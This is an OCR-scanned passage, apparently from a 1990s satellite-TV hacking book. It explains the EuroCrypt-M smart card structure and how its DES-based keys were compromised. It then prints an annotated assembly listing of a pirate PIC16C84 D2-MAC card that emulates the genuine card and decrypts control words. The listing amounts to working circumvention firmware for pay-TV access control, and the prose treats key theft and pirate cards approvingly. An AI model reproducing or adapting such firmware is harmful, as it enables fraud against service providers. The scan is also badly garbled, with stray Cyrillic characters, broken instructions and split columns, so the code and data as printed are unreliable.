Typically these bytes are allocated from the six most significant bits of the 
customer's international phone number. The other byte is the subject code, 
(SC). 


The Entitlements 


Basically this is what the card is permitted to decrypt. The information in this 
section is the subscription, programmes or the amount of credits available. 
Of course before the card proceeds to generate a control word, it will check 
this section to see that it is permitted. 


FAC 


This is the general purpose data and is not critical data. Typically it would be 
the telephone number of the subscription centre (for modem link back) or 
other data. 


The Issuer Entity 


The issuer entity is essentially the soul of the card. It contains the 
information that is common to all of the Service Entities. The information 
stored in this entity is in four subsets. 


The Unique Address 


The UA is thirty six bits wide. This is the card identification code. It is used 
for card management by the issuer or the programme providers. 


The PIN Code 


This is just like the PIN code for bank cash card machines except in this 
application it relates to pay services and other functions. 


The Maturity Rating 


This is the period for which the present card is valid. When the card is reset, 
this rating is one of the first items of information returned from the card. 
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The Preselection Area 


This section is used to store pre-booked programmes and other events. 
The programmes stored in this area will then be accessed without the user 
having to select them on the day. 


There are two extremely important routines that provide indications as to the 
characteristics of the critical data. Above all, one of them actually gives the 
number of keys in use on a particular service at the time the service is 
selected. This is an unusual attribute for a system. 


Card Reset 


When the card is inserted in the decoder it is reset. This starts the card 
decoder link but of most interest when the link is established it then returns 
a seven byte record. The bytes are: Component Number, Mask Number, 
Extension Byte 1, Extension Byte 2, Locks (Card Age), ME1 and МЕ2. The 
ME1 and МЕ2 bytes are the status words. 


Entity Selection 


In order to access a channel, the card has to select that particular Service 
Entity. When the entity has been successfully selected, it will return a 26 
byte record. 

(3 bytes) PPID 

(2 bytes) Memory Allocation for Entity 

(1 byte) Authorised Access Modes 

(2 bytes) Memory Allocation minus Memory Used 

(1 byte) Memory remaining for Entity 

(16 bytes) Indices of enabled keys 

Of these, the last is the most critical. It is an index of the active keys on the 
service. The format is a nybble represented by a hexadecimal number. 
Padding bytes of the value FF are used where the number of keys active is 
less than 16. 

Eight of these keys are management keys and the other eight are the 
operation keys. The management keys are designated 00 to 07 and the 
operation keys are designated 08 to OF. 

The actual length of the keys appears to be 64 bits or eight bytes. This 
indicates that the crypto algorithm in use is DES or DES like. The recent 


hacks have proven that it was indeed the DES algorithm, albeit in a slightly 
modified format. 
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This system is a one level system. The card is the sole security of the 
system. When it is hacked, the system is compromised. A new card has to 
be issued. 


There are four elements required for the hack. The hash function, the crypto 
algorithms, the management keys, and the operation keys. A minimal hack 
requires the hash function, the crypto algorithms and the operation keys. 


The fact that the hash checksumming function was not required in the initial 
pirate hacks was typical of the incompetence of the channels using the 
system. If they had started to send spoof packets it would have knocked out 
many of the pirate devices. This type of ECM was so simple that even News 
Datacom had used effectively on issue 07. It is always the simple things 
that will bring a hack down typically because the significance of certain 
routines is not understood at the time the hack is being implemented. 


The Hacking Of EuroCrypt-M 


EuroCrypt-M is a feature ridden hulk of a system. It contains many 
wonderful aspects and one fatal flaw. The flaw is that the decryption 
algorithm can be detached from the access control routines and made to 
work independently. 


When such a flaw exists in any system, the only thing that the programme 
provider can do is to repeatedly change the keys for the decryption 
algorithm. Of course this is of little use if the key update routines have been 
compromised as well. The hacker version will have a limited key update 
facility included. 


The pirate smart cards for Canal Plus and Cine Cinema have the key 
update facilities incorporated. This means that when the channel updates 
the key over the air, the pirate cards are similarly updated. However while 
the hackers and pirates have the management keys for the FilmNet, 
TV1000 and TV3 channels, the less than frequent key updates do not make 
it important for the pirate cards to include the management keys. Besides, 
every key update on these channels means more revenue for the hackers 
and pirates. 


Some of the current thinking is that FilmNet and TV1000 will resort to a key 
cycling over the Autumn. This basically means that they will switch between 
keys rather than relying on the limited downloading of new keys. The reason 
for this is that some of the PIC16C84 implementations do not have the full 
keyset. This is often due to the constraints of available memory. It would be 
a temporarily successful ECM. 
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There is a rumour that the original PIC16C57 hack on the EuroCrypt system 
included the full array of keys, both management and operational. This code 
has been popped and its significance was overlooked. But as the 
knowledge of the hackers has grown, so to has the number searching for 
this lost file. You sort of get the impression of an Indiana Jones type search 
through backup disks and BBSes. Actually there have been messages 
posted about a twin PIC16C84 with two 24C65s which also has the 
management keys. 


Such a catastrophic failure of security is due mainly to a poorly structured 
system architecture that does not permit ECMs. In some respects, the 
system is a Frozen Architecture system. The EuroCrypt-M system is a 
classic example of this failure. 


The EuroCrypt-M system was flawed from the start. It was committee 
designed and certified. It was accepted by the paper shufflers of the 
European Commission as a good system and they made it the European 
standard. The fact that it was accepted as a standard meant that the system 
specification, less the secret algorithm, was openly available. You could 
actually buy a copy of the specification document for the system. 


France Telecom, to the eternal gratitude of the hackers throughout Europe 
chose the US Data Encryption Standard algorithm to be their secret 
algorithm. Of course France Telecom modified the implementation of the 
algorithm to make it run faster. The modifications are merely the removal of 
the Initial Permutation (IP) and the Inverse Initial Permutation (-IP). 


Other versions of EuroCrypt use the DES algorithm with the Initial 
Permutation and the Inverse Initial Permutation. However these too are 
hacked. 


Sometimes it may seem hard to understand why France Telecom, when 
developing EuroCrypt-M would choose the most examined and well 
understood algorithm in the world as their secret algorithm. It is not exactly 
secret but it is a good algorithm. At the time they selected it, around 1988, 
the hacker technology to pop smart cards did not exist. It was also very 
much a minority system with a very small installed decoder base. It was not 
until FilmNet switched to EuroCrypt-M that it became a lucrative target. With 
TV1000 also using it, there was no question about it. EuroCrypt-M was 
doomed. 


The main problem with DES as used in smart cards is that DES is a 
hardware based algorithm. A software implementation will naturally be less 
effective than a hardware implementation. There are some good DES ICs 
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available but the design constraints of the application meant that these 
could not be used. 


In retrospect, they could have gone for something more innovative such as 
a hashing algorithm. This would make it easier to prove that there was an 
infringement of the software copyright in any pirate smart card case. Of 
course now it looks like the whole system was based on the false premise 
that the smart card was unhackable. 


Though the EuroCrypt-M system is a feature ridden hulk, some of these 
features are extremely good ones. The reason that the system does not 
lend itself readily to ECMs seems to be because the key handling protocols 
were considered so strong. 


In theory, the key handling protocols are the strongest aspect and had they 
been used as per the designers intended, EuroCrypt would have been very 
difficult to hack successfully. However the clutter of all the other features, 
incapable technology and what can only be described a lack of appreciation 
scuttled the strongest aspect. 


At the moment, the control word changes every 10.24 seconds or 256 
frames. The control word key, the one used to encrypt the control word, is 
only changed every few months at best. The key used to encrypt the new 
control word key is called the management key. This rarely changes. 


Theoretically, the control word key should be changed frequently, perhaps 
every few hours instead of every few months. The management keys 
should be changed approximately every month. The idea here is to make 
the whole key systems into a key cloud where nothing remains stable for 
long enough to become usable by a hacker. 


Much of the thinking here is that of the mid eighties. Indeed North American 
readers will notice the similarity of the theory with the VideoCipher II system. 
Indeed one implementation of the EuroCrypt system was as an Embedded 
Secure Microcontroller system. With such a system, this kind of thing would 
have easily have been achievable in a couple of secured microcontrollers, 
as indeed it had been in the VideoCipher ІІ system. It was like all of the 
designers were using a variation of a single idea. It was a very conventional, 
almost textbook, implementation of key handling. Bureaucracies reward 
conformity not ingenuity. 


However the smart card offered a more secure medium especially after the 
fiasco of the VideoCipher ІІ system and all of its attendant hacks. The smart 
cards looked to be more secure at that point in time than any of the other 
technology and they were easier to distribute and eventually replace 
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However reality reared its ugly head and technology compromised the key 
handling protocol. The only cheaply available smart cards at the time were 
EPROM. The constraining factor here was that the keys could not be 
updated in EPROM as often as in EEPROM. 


The key system in EuroCrypt-M is a hierarchical one. The lowest key in the 
structure is the one that should be most frequently changed. The ones 
higher up are, according to the theory, changed less often. 


Failure in this kind of system is twofold. The first point of failure is when the 
key changes are not as regular as they should be thus providing a relatively 
static target for any hacker. The second point of failure is when the keys in 
the upper area of hierarchy are discovered. Since these keys are not 
changed regularly, the hacker or pirate has full access to all of the lower 
keys. Given the present situation, the only viable option left open to some of 
the channels is a completely new card issue and perhaps an algorithm other 
than DES. 


The Single PIC16C84 D2-MAC Card 


Originally the D2-MAC EuroCrypt hack relied on a PIC16C57. This was 
because it had more memory space than the PIC16C54. However the 
PIC16C57 was an EPROM/OTP type and the newer PIC16C84 was 
reprogrammable, being an EEPROM type. With the increasing availability, 
there was a move towards twin PIC16C84 cards for D2-MAC. 


With the advent of PicBuster, (see Chapter 3), the code from these 
PIC16C84s became more widely available. It was found that a lot of 
routines could be dispensed with in order to produce a bare metal 
implementation that would work. 


The documented disassembly given on the pages following, (courtesy of 
David Parkinson), is an excellent example of how the single PIC16C84 
D2-MAC cards work. 


The single PIC version was derived from studying the source code from a 
number of pirate PIC cards. Redundant routines such as those to handle 
switching between keys by the use of touchpads were removed. Also the 
recognised commands were trimmed down to the ones essential to proper 
operation. This version also optimised the DES so that it occupied less 
memory. It is regarded as the fundamental single PIC implementation and 
has been used by many hackers to understand how the pirate D2-MAC 
EuroCrypt cards work and to develop their own implementations whether in 
PIC16C84s or C or PASCAL. 
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title “EUROCRYPT - Single PIC version - Nov 1995" 
subtit] "Definitions" 
list с-132,Р-16С84,К-ПЕС,Ғ-іпһх8М 


Originally froma dis-assembly of commercial pirate card. 
The assembles with MPALC.EXE. 


Comments/labels by David Parkinson 


; Version Date 

0.3 18 Nov 1995 DES code restructured to improve 

$ efficiency and speed. (>128bytes free) 

i 


;0.2 11 Nov 1995 Incorporated fix from Ralph Metzler 
; so the Nokia behaves. 


;0.1  Oct/Nov 1995 (Still working оп it) 


Sort this out eventually. Currently TxByte and 
RxByte have hard coded instructions for Bit 6. 
2 ***Check those routines if you change this**** 
IFbit equ 6 
IFmask equ OBFh 


: Some Macros to help readability 


map Macro ri,bl,r2,b2 ; Map abit ina byte to another 
btfsc ri,bl 
bsf r2,b2 
endm 


; Used in the DES routines to do the key expansion. This maps 
specified bits in various bytes into bits 5-0 of a target byte 
BuildEkey Macror,ri,b1,r2,b2,r3,b3,r4,b4,r5,b5,r6,b6 


ТТ r 

map r1,b1,r,5 
map r2,b2,r,4 
map r3,b3,r,3 
map r4,b4,r,2 
map r5,b5,r;t 
map r6,b6,r,0 
endm 


; Used in the DES routines to store four bits of ап S-Box 
2 lookup (Ло nibble) into the specified byte(s) :bit(s) 
StoreLoMacro r1,b1,r2,b2,r3,b3,r4,b4 
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movwf Etemp 

map Etemp,3,r1,b1 
map Etemp,2,r2,b2 
map Etemp,1,r3,b3 
map Etemp,0,r4,b4 
endm 


i Used in the DES routines to store four bits of an S-Box 
А lookup (hi nibble) into the specified bytes:bits 
StoreHiMacro  r1,b1,r2,b2,r3,b3,r4,b4 

movwf  Etemp 

map Etemp,7,r1,b1 

map Etemp,6,r2,b2 

map Etemp,5,r3,b3 

map Etemp,4,r4,b4 

endm 


E Convert data into a 'retlw' type table (8 bytes) 
Rdata Macro k1,k2,k3,k4,k5,k6,k7,k8 


retlw kl 
retlw k2 
retlw КЗ 
retlw k4 
retlw k5 
retlw k6 
retlw k7 
retlw k8 
endm 


$ File register usage 
Identity equ 01 


pch equ OAh ; Hi byte of PC counter 
entity equ OCh ; Used to hold “entity” type 
ECW equ OCh ; Even control word (8 bytes).. 


; Stored here 

r14 equ 14h 

ri5 equ 15h 

r16 equ 16h 

r17 equ 17h 

r18 equ 18h 

r19 equ 19h 

r1A equ 1Ah 

r1B equ 1Bh 

г1С equ 1Ch 

r1D equ 1Dh 

Г1Е еди 1Еһ 

rlF equ 1Fh 

e_CLA equ 1Ch ; Instruction Class 
e_INS equ 1Dh 

eAl equ 1Eh 

e A2 equ 1Fh 

e_LEN equ 20h 

Etemp equ EEdata ; Used during ‘encrypt’ process 
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Rcount equ 20h ; Round counter 
k1 equ 21h %-------- \ 
k2 equ 22h | 
k3 equ 23h | 
k4 equ 24h DES Key | 
k5 equ 25h f 
k6 equ 26h | 
k7 equ 27h %-------- / 


ек1 equ 28h Н 

ек2 еди 29һ | 

ek3 equ 2Ah ; expanded | 

ek4 equ 2Bh ; (working) | 

ек5 еди 2Ch A DES | 
; | 
; | 


ек6 equ 2Dh key 
ek7 equ 2Eh 
ek8 equ 2Fh +-------- / 


Used as bit counter in UART routine 
Used in delay routine when Rx data 

Used to hold UART data 

Used for parity calculation 

Used when rx bytes 

Used to determine which Instruction 
Save copy of e_Al instruction parameter 


Ubcount equ 28h 
Dcount equ 29h 
Udata equ 2Ah 
Uparity equ 2Bh 
RxCount equ 2Ch 
Icount equ 2Dh 
SavedAlequ 2Eh 


; We use the top bit of the status register to flagifa 
; command is not supported (i.e. Absent) 
Absent equ 7 
subtit] “General Routines” 
page 
org0 
Н Power up/Reset starting point 
5 Wait abit and then send a 9 byte “answer to reset" 
call DelayXX 


moviw 9 

movwf  Rcount ; Rcount =9 
movlw  AnsRes ; Answer to Reset 
call TxMsg 


This is where we send a command completion response 
It is either 90 00 (a11 Ok) 
or 90 08 (Argument Absent) 
omplete movlw 90h 
call TxByte 
swapf  status,w 
andiw 8 ; Mask out top bit of status 
TxME2 са11 TxByte ; send either 0 or 8 
2 Do some initialisation and then wait for а 5 byte 
z command from the decoder. This is read into the buffer 1C-20 


Cee oe wees 


movf e Al,w ; Savee A1 

movwf SavedAl ; (used in "Read Data" command) 
bcf status,Absent ; Clearbit7 

сігҒ рсһ ; Ensure Hi address bits are clear 
moviw 5 
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mov lw 
movwf 
RxCmd call 
movwf 
incf 
decfsz 
goto 
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RxCount 

e. CLA ; Point at r1C (Class byte) 
ptr 

RxByte ; Read 5 bytes in to d-»20 
indirect 

ptr,f 

RxCount , f 

RxCmd 


P We've received a command, now try and 
; and carry it out. 


mov lw 
movwf 
FndCmd movf 
addlw 
call 
xorwf 
jz 
decfsz 
goto 
goto 


9 ; 9 possible instructions 
Icount 

Icount,w ; Index into table 

InsTab-1 ; Table base 

LookUp ; Load value 

e INS,w ; Compare with Instruction type 
GotIns ; Skip if the same 

Icount,f ; Loop if more 

FndCmd 

Complete 


E We've recognised an instruction... 
р ..now аст on it. 


GotIns movf 
sublw 
btfss 
goto 
movf 
jz 
movf 
call 

NoAdd  movf 
addlw 

LookUp movwf 

AnsRes Rdata 
retlw 


Icount,w 

6 ; Icount >= 6? 

status,C 

NoAdd ; Yes, get on with it 

e LEN,f ; No, test length request 
NoAdd ; Skip if no additional data 
e INS,w ; ..else ACK the instruction 
TxByte 

Icount,w ; W= Icount 

Jtable-1 ; Add base address 

pcl ; Go to it 


03Fh,067h,02Fh,000h,011h,014h,000h,003h 
68h 


; This table provides a pointer to the "issuer id" 


IDtableRdata 


FNPid, TVid, TVid2, THid, BBCid, FNPid, FNPid, FNPid 


; These are the issuer IDs 


FNPid retlw 
retlw 
TVid retlw 
retlw 
Tvid2  retlw 
retlw 
THid retlw 
retlw 
BBCid retlw 
retlw 
Msgl гесім 
retlw 
retlw 
retlw 
Msg5 retlw 
retlw 


28h ; FilmNet Plus 0028 10 
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retlw Ox8f 
Msg6 retlw 0x10 
retlw 0x02 
retlw Охса 
retlw 0x20 
retlw Oxff 


+ Table of Instructions we recognise 
InsTab retlw 02h ; Retrieve genera] purpose data FAC 


retlw 04h ; Request result after selecting FAC 
retlw OB8h ; Read Data 

retlw OA4h ; Select issuer entity 

retlw OCOh ; Read Result 

retlw 006h ; Read block in FAC after selecting block 
retlw 024h ; PIN controlled operations 

retlw 088h ; Compute Control Word 

retlw 026h ; ???7? 


Jtable goto Ins. 02 
goto Ins 04 
goto Ins. B8 
goto Ins A4 
goto Ins. CO 
goto Ins. 06 
goto Ins 24 
goto Ins. 88 
goto Unknown 
; 8702... (6.15.5) 
; Retrieve general-pupose data ҒАС 
; 3 bytes to come. Just absorb them and flag ‘AA’ 
$ in final reply if “next block” is requested 
Ins_02 bcf status ,Absent 
102 1р call RxByte 


xorlw 40h ; Is byte 0x40? (Next block req) 
btfsc  status,z 
bsf status,Absent ; Flag “AA” response needed if so 


decfsz Rcount,f 
goto 102 lp 
goto Complete 
; 87 04... (6.15.6) 
3 Request result after selecting ҒАС 
; Just send back fixed message 1 
Ins. 04 movlw М501 
call TxMsg 
goto Complete 
; 87 06...(6.15.7) 
2 Read block in FAC after selecting block 
$ Just send back fixed message 6 
Ins_06 movlw Msg6 
call TxMsg 
goto Complete 
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“Instruction class unknown to card” 


Unknownmovlw O6Eh 
call TxByte 
movlw 0 
goto TxME2 


; CAB8.... (6.15.4) 
; Read Data - Not too sure what's happening here, 
Н (just sending the previous e_Al byte). 
Ins_B8 movf SavedAl,w 

call TxByte 

decfsz e LEN,f 

goto Ins. B8 

bsf status,Absent 

goto Complete 
< CAA. san (6.3.1) 
; Select Issuer entity 


Ins. А4 тоу} e Al,w ; Check A1 byte 
jz A4 iss ; "issuer" if 0 
xorlw 2 
jz A4 next ; "next" if 2 
xorlw 6 ; Creset “2” and check against 4) 
jz A4_dir ; "direct" if 4 


goto Complete 
A4_iss clrf entity 
goto Complete 
A4. next incf entity,f 
btfsc  entity,3 
bsf status,Absent 
goto Complete 
A4 dir call RxByte 
call RxByte 
andlw  OFh 
movwf Identity 
swapf  Identity,f 
call RxByte 


This is the start 


increment count on "next" 


Finish when entity=8 


Discard this byte 
take this one... 
...Mask lo nibble 
Save... 

...inhi nibble 


andlw OFOh 
addwf Identity,f 
swapf  Identity,f ; Build identity in r01 


goto Complete 
CA 88... (6.9) 
Compute Control Word 
Work out what key to use and read it from the 
EEprom data area 


A 


ns_88 movlw Ох1А 
subwf e LEN,f 
movf Identity,w ; Get "identity" 
andlw 7 ; mask to 0-7 
movwf ЕЕадг ; Set address 
movf е A2,w ; identifies the key # 
andlw 1 ; Differentiate between two keys... 
addwf EEadr,f ; (adjust address if necessary) 
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moviw ki ; Point at k1-» 
movwf ptr 
movlw 7 
movwf | Icount ; Set count = 7 
I88 rd bsf status,5 ; switch to page 1 
bsf EEcon1,RD ; Trigger the “Read” bit 
bcf status,5 ; switch to page 0 
movf EEdata,w ; Read the data 
movwf indirect ; Save it 
incf ptr,f ; Bump addresses (by 9) 
moviw 9 
addwf — EEadr,f 
decfsz Icount,f ; Loop if more 
goto I88 rd 
І88 clrcall Tx 77 ; Dump any remaining bytes 
call RxByte 
decfsz Rcount,f 
goto I88 clr 
call Rx8Bytes ; Rx the control word 
call Encrypt ; Recover seed 
movf r14,W ; Copy down to 0С-13 
movwf ECW 
movf r15,W 
movwf ECW+1 
movf r16,W 
movwf ECW+2 
movf r17,W 
movwf ECW+3 
movf r18,W 
movwf ECW+4 
movf r19,W 
movwf ECW+5 
movf r1A,W 
movwf ECW+6 
movf r1B,W 
movwf ECW+7 
call Rx8Bytes ; Rx the next control word 
call Encrypt ; Recover seed 
call Тх 77 ; Dump the two bytes РІ... 
call RxByte 
call Tx_77 ы Ұ10 
са11 RxByte 
movlw 0x89 ; Send 89 ACK 
call TxByte 
moviw 8 
movwf е LEN 
Flush call RxByte ; Receive & dump 8 bytes of hash 
decfsz e LEN,f 
goto Flush 
goto Complete 
CA CO. sess (6.6) 


Read Result 


In 5_С0 movlw 


6 ; Is requested length--6? 
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xorwf e LEN,w 


jz C0. 156 

movlw OEAh ; No, must be ECW/OCW 

call TxByte 

movlw 16 ; 0x10 

call TxByte 

moviw 2 

subwf e LEN,f ; e.LEN -= 2 

movlw ECW 

movwf ptr ; from г0С-> 
CO_cws movf indirect,w 

call TxByte ; Send seed values 


incf ptr,i 

decfsz e LEN,f 

goto CO. cws 

goto Complete 

Send the IDs for channels for which we have access 


CO. 156 movf entity,w ; get the requested "entity" (0->7) 
addlw  IDtable ; Index into the table 
call LookUp 
movwf Icount ; Save pointer 
movlw 0 
call TxByte ; Send 00 
movlw 2 
movwf e LEN ; Set length = 2 
movf Icount,w 
call TxMsg ; Send message (e. LEN bytes @ Scount) 
movlw 3 
movwf e LEN ; Finish off 
movlw  Msg5 
call TxMsg 


goto Complete 
; CA24... (6.4) 
Е PIN code controlled operations 
; Just respond with 25 and absorb all bytes sent(?) 
Ins_24 movlw  025h 
call TxByte 


goto Flush ; Dump all i/c bytes 
subtit] “Serial Interface" 
page 


: TxByte - send a byte to the decoder 
Тх 77 movlw 77h 


TxByte movwf Udata ; Put byte in Udata 
comf Udata,f ; Complemented data is sent 
movlw 32h ; Wait 


call DelayW 
movlw  IFmask 


tris PortB ; Set o/p bit 
сігҒ Uparity 

bcf PortB, IFbit ; Clear i/f bit 
movlw 8 

movwf  Ubcount ; Set bit count 


9-34 


9: Multiplexed Analogue Component 


Tx_Ip call DelayXX ; Bit delay 
rrf Udata,w ; get MSB to bit 6 
xorwf  Uparity,f ; Build parity 
movwf PortB ; Send next bit 


rif Udata, f 
decfsz Ubcount,f 
goto Tx lp 
call DelayXX 
comf Uparity,w 


movwf  PortB ; Parity bit 
moviw 0х10 ; Stop bit? 

call DelayW 

moviw  OFFh ; Port back to i/p 
tris PortB 

movlw  4Fh ; Final delay 
call DelayW 

геи 0 


; RxByte - receive а буте from the decoder 
RxByte btfsc PortB,IFbit 
goto RxByte 


movlw  02Ah 

call DelayW 

поуім 9 

movwf  Ubcount 

bcf status,c 
;RxLoopmovf PortB,w ; Read in to W (why?) 
n rif PortB,f ; Shift MSB to carry 
RxLoop movf PortB,w ; Read in to W (why?) 

rif PortB,w ; Get data into w/7 

addlw 80h ; w/7->carry 

rif Udata, f ; Shift carry into 2A 


call DelayXX 
decfsz Ubcount,f 
goto RxLoop 
rrf Udata,f ; Remove parity bit! 
moviw 0x28 
call DelayW 
comf Udata,w ; Correct for data sense 
return 
; Delay routines 
DelayXXmovlw 27 ; 27 loops 
DelayW movwf  Dcount ; Set delay counter 
DelayLpdecfsz Dcount,f 
goto DelayLp 
retlw 0 


Rx8bytes and store at 18-1F 


Rx8Bytes movlw r18 ; point at Data area 
movwf ptr 
movlw 8 ; 8 bytes to receive 
movwf RxCount 

R8.]p call Tx 77 ; Senda “77” 
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call RxByte 
movwf indirect 
incf ptr,f 
decfsz RxCount,f 
goto R8 1р 
retlw 0 


H Send out a fixed message of length <e_LEN>. 
A Pad with FFs if nec. 


TxMsg movwf  Icount ; Icount =W 
movf e_LEN,f ; Test e_LEN 
btfsc  status,z ; Is it zero? 
return ; Yes, return.... 
Txm lp movf Icount,w ;..е1$е 
са11 LookUp 
xorlw  OFFh ; Complement W 
btfss  status,Z ; Skip if itwas FF... 
incf Icount,f ; ...е1$е ++Icount (table index) 
xorlw  OFFh ; Restore W 
call TxByte ; Send out the byte 


decfsz e_LEN,f 

goto Txm lp 

return 

subtit] “DES Encryption" 

page 
; Encrypt. 
ч Using the key іп К1-К7 encrypt the дата іп 18-1F 
s (Working key in r28-2F - data working area 14-17) 
Encryptmovlw 16 ; 16 rounds 

movwf Rcount 
Enc 1р decf Rcount, f 
btfsc  Rcount,7 ; Exit when Rcount goes -ve 
retlw 0 
We һауе 56 bits of key in k1....k7 rotate left the 
two 28 bits halves (split is in the middle of k4) 
We do the shift all-at-once and then deal with the 


carry bits 
call GetShf ; Get the shift count 
movwf  Etemp 

Ishift bcf 5тати5,с ; Clear carry 
rif k7,f ; Shift it all left 
rif k6,f 
rif k5,f 
rif k4,f 
rif k3,f ; shift k1-23 left 
rif k2,f 
rif k1,f 
btfsc k4,4 + if this is set... 
bsf k7,0 ; ++. rotate 
bcf k4,4 ; Clear (in case carry clear) 
btfsc status,c 
bsf k4,4 ; Rotate carry to k4:4 
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decfsz Etemp,f 

goto Ishift 

We've done the shift, now we need to do the Permutation 
to produce the 48-bit key according to table PC-2. 

To simplify the following the code we permute the key 
into the lower 6 bits of 8 bytes. (ek«n» - expanded key n) 
BuildEkey ek1, k2,2,k3,7,k2,5,k3,0,k1,7,k1,3 
BuildEkey ек2, k1,5,k4 
BuildEkey ek3, k3,1,k3 
BuildEkey ek4, k2,0,k1 
BuildEkey ek5, k6,7,k7 
BuildEkey ek6, k4,2,k5 
BuildEkey ek7, k6,4,k7 
BuildEkey ек8, k6,2,k6,6,k7,6,k5,4,k4,3, k4,0 

We've now built the working key up in ek1-ek8. Clear 
the area where we will store the result of the round... 


k2,1, 
k2,4, 
k4,5, 
k4,1, 
k7,5, 
k5,1, 


4, 
5, 
1, 
4, 
10, 
‚7, 


clrf r14 
clrf r15 
clrf r16 
clrf r17 
bsf рсһ,0  ; Set address range to 11xxxxxxxx 


; (was already 10xxxxxxxx for shift lookup) 


Now select data bits according to the Bit-selection 
table E and build up six bits in Etemp from data in 1C-1F 
We want r1F:0 r1C:7 r1C:6 r1C:5 r1C:4 r1C:3 


rrf rlF,w ; Get LSB of r1F into carry 

rrf r1C,w ; Get 1C:7-3 into W:6-2 

movwf  Etemp ; Put in Etemp (bottom 2bits are junk) 
rrf Etemp, f 

prf Etemp,w ;W=six bits of data... 

xorwf  ekl,w ; XOR with key 

andlw ОЗЕҺ ; Mask to six bits 

call LookUp ; Do Sbox lookup 


Finally we have to go through Permutation (P) 
toget the bits in the right position in the 
result 

StoreLo r15,7, r16,7, r16,1, r17,1 

Now build the next six bits of data in Etemp. 
We need: r1C:4 r1C:3 r1C:2 r1C:1r1C:0 r1D:7 


rif r1D,w ; Get r1D:7 intocarry.. 

rif riC,w ; ..and thence into Wwith other bits 
xorwf  ek2,w ; XOR with key... 

andlw  3Fh ; Mask off six bits 

iorlw 52 Box & 255 ; Next S box 

call LookUp ; Do Sbox lookup 


StoreLo r15,3, r17,4, r14,6, r16,6 
Now build the next six bits of data in Etemp. 
We need: r1C:0 r1D:7 г10:6 r1D:5 r1D:4 г10:3 


rrf rlC,w ; Put r1C:0 into carry 
rrf r1D,w ; wer1C:0,r1D:7......... 
movwf  Etemp 

rrf Etemp,f 

rrf Etemp,w ; w=data 

xorwf  ek3,w ; XOR key and data 
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апам 3Fh ; mask out 6 bits 
iorlw S3 Box & 255 
call LookUp ; Do S-box lookup 


StoreLo r16,0, r15,0, r17,2, r14,2 
Next 6 data bits: г10:4 r1D:3 r1D:2 г10:1 г10:0 г1Е:7 


rif г1Е,м ; бес r1E:7 into carry.. 

rif r1D,w ; ..and thence into wwith the rest 
xorwf  ek4,w ; ХОК key and data 

andlw  3Fh ; Mask to six bits 

jorlw 54 Box 4255 

call LookUp ; Do s-box lookup 


StoreLo r17,6, r16,4, r15,6, r14,7 
Next 6 data bits: г10:0 г1Е:7 r1E:6 г1Е:5 г1Е:4 г1Е:3 


rrf r1D,w ; Get LSB of r1D into carry 

rrf rlE,w ; Get 1E:7-3 into W:6-2 

movwf Etemp ; Put in Etemp (bottom 26175 are junk) 
rrf Etemp,f 

rrf Etemp,w ; w-data bits 

xorwf  ek5,w ; XOR with key 

andlw  03Fh ; Mask to 6 bits 

call LookUp ; Do s-box lookup 


StoreHi r14,0, r15,2, r17,7, r14,5 
Next 6 data bits: r1E:4 г1Е:3 г1Е:2 г1Е:1 г1Е:0 r1F:7 


rif rlF,w ; Get r1F:7 intocarry.. 

rif rlE,w ; ..and thence intowwith the rest 
xorwf  ek6,w ; XOR with key 

andlw  3Fh ; mask to 6 bits 

iorlw 52 Box & 255 

call LookUp ; Do s-box lookup 


StoreHi r14,4, r17,3, r15,5, r16,5 

Next 6 data bits: г1Е:0 r1F:7 r1F:6 r1F:5 r1F:4 r1F:3 
rrf rlE,w ; Put r1E:0 into carry 

rrf rlF,w ;w-rlE:O,r1F:7......... 
movwf Etemp 

rrf Etemp,f 


rrf Etemp,w 

xorwf  ek7,w ; XOR with key 
andlw  3Fh ; Mask to 6 bits 
iorlw S3 Box &255 

call LookUp ; Do s-box lookup 


StoreHi r17,0, r15,4, r16,2, r14,1 
Final 6 data bits: r1F:4 r1F:3 г1Е:2 r1F:1 г1Е:0 г1С:7 


rif r1C,w ; Get r1C:7 into саггу.. 

rif rlF,w ; ..and thence into w (and the rest) 
xorwf  ek8,w ; XOR with key 

andlw  3Fh ; mask to 6 bits 

iorlw 54 Box &255 

call LookUp ; Do s-box lookup 


StoreHi r14,3, r17,5, r15,1, r16,3 

We've now done an encryption round, let's 
XOR with the other half of the data in 18-1B 
movf r18,w 

xorwf г14,# 

movf r19,w 
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xorwf  r15,f 
movf rlA,w 
xorwf  r16,f 
movf r1B,w 
xorwf  r17,f 
Н Reorganise the Left and Right halves 


Н 1C-1F -> 18-18, 14-17 -> 1C-1F 
movf r1C,w 
movwf  r18 
movf r1D,w 
movwf  r19 
movf rlE,w 
movwf  r1A 
movf rlF,w 
movwf  r1B 
movf r14,w 
movwf г1С 
movf r15,w 
movwf  r1D 
movf r16,w 
movwf  rlE 
movf г17,м 
movwf  rlF 


goto Enc. ]p ; Next round 
org 2ECh ; Keep close to S-Box table 
; GetShf 


$ Look up and return the number of shifts required for 
; this round of the algorithm (table indexed in reverse) 
GetShf movlw 2 


movwf pch ; Set address range to 10xxxxxxxx 
movf Rcount ,w ; r-Rcount (round count) 

addwf рс1,Ғ ; index into shift table 

Rdata 1,2,2 


2, 
Rdata 2,2,2,2, 
list r=hex 


z These are the S-Box tables. Each is used twice; each 
а entry is actually 4-bits іп size so the first 8 lookups 
3 extract the low nibble - the remaining eight the hi nibble. 


S1 Box Rdata  02E,0E0,0C4,0BF,04D,027,011,0C4 
Rdata 072,04E,0AF,072,0BB,0DD,068,011 
Rdata 083,05A,05A,006,036,0FC,OFC,0AB 
Rdata 005,039,009,095,0Е0,083,097,068 
Rdata 044,0BF,021,08C,01E,0C8,0B8,072 
Rdata 0AD,014,0D6,0E9,072,021,08B,0D7 
Rdata OFF,065,09C,0FB,0C9,003,057,09E 
Rdata 063,0AA,03A,040,005,056,0E0,03D 


S2 Box Rdata OCF,0A3,011,0FD,0A8,044,0FE,027 
Rdata 096,07F,02B,0C2,063,098,084,05E 
Rdata 009,06C,0D7,010,032,001,04D,0EA 
Rdata  0EC,006,070,089,055,03B,0BA,085 
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Rdata 090,040,0ЕЕ,038,0Ғ7,02А,058,0С1 
Rdata 02Ү,093,084,05Ғ,0С0,0Ғ4,031,0АЛ2 
Rdata 075,0BB,008,0E6,04C,017,0A6,07C 
Rdata 019,060,0D3,005,0B2,08E,06F,0D9 


Rdata 04A,0DD,0B0,007,029,0B0,0EE,079 
Rdata 0F6,043,003,094,08F,016,0D5,0AA 
Rdata 031,0Е2,0С0,038,09С,055,077,0СЕ 
Rdata 05B,02C,0A4,0FB,062,08F ,018,061 
